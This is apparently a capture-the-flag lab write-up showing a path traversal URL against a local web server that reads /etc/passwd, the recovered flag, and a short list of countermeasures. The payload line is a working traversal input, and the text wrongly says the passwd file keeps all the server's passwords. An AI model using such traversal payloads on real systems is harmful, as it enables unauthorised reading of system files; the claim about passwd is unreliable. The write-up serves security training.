http://192.168.57.3/index.php?page=/../../../../../../../../../../../etc/passwd

Found a traversal fail.
It mean that we can freely move in the server directory with the right url.
Here we gain access to the file "passwd" that should keep all password of the server. 

Congratulaton!! The flag is : b12c4b2cb8094750ae121a676269aa9e2872d07c06e429d25a63196ec1c8c1d0 

-------------------------- Countermeasure ----------------------------------------
    - Should not give root lvl to the server.
    - Should limit where the server can go. 
    - User a REST api server 
    - Check the request before processing
    - Configure your htaccess